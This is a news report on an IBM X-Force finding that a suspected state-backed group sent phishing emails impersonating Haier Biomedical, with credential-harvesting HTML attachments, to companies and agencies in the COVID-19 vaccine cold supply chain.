IBM X-Force specialists have detected an active malicious campaign: an unidentified cyber group attacks the COVID-19 vaccine supply chain. Attacks are carried out on selected organizations, one way or another related to the storage and transportation of vaccines.
Experts were unable to link the campaign to any particular cybercriminal group, but they did identify the hallmarks of government-funded hackers.Let me remind you that cybercriminals also attacked COVID-19 vaccine developers.
During attacks, cybercriminals send phishing emails to their victims in order to steal their credentials for authorization in e-mail and other applications.
“Cybercriminals have attacked a wide range of companies, sectors and government agencies, including the European Commission’s Directorate General for Taxation and Customs Union, which oversees the movement of goods across borders, including medical supplies”, – say IBM X-Force researchers.
The attackers also targeted a solar panel manufacturer for transport refrigerators that transport vaccines and a petrochemical company that makes dry ice used for transportation of vaccines.
Another victim of the group is an IT company in Germany that creates websites for pharmaceutical manufacturers, carriers, biotech companies and manufacturers of electrical components for sea, land and air navigation and communications.
Attackers target the elected leaders of each company.
“These are usually people working in the sales, purchasing, IT and finance departments involved in the so-called cold supply chain – transporting vaccines at the required temperature”, – experts from IBM X-Force report.
Typically, cybercriminals send an email to the victim, allegedly on behalf of the Chinese company Haier Biomedical, which is an official member of the UN Cold Chain Equipment Optimization Platform (CCEOP) program. The phishing emails are disguised as CCEOP-related RFQs.
The emails contain malicious HTML files that the user must download and open locally on their computer. Once opened, the file asks the victim for credentials, allegedly for looking its contents. This approach frees attackers from having to create phishing online pages that can be detected by security researchers or law enforcement agencies.
The victims of cybercriminals were organizations not only in Germany, but also in Italy, the Czech Republic and other European countries, South Korea and Taiwan.
Recall also that In Brazil, data of 16 million patients with COVID-19 got public.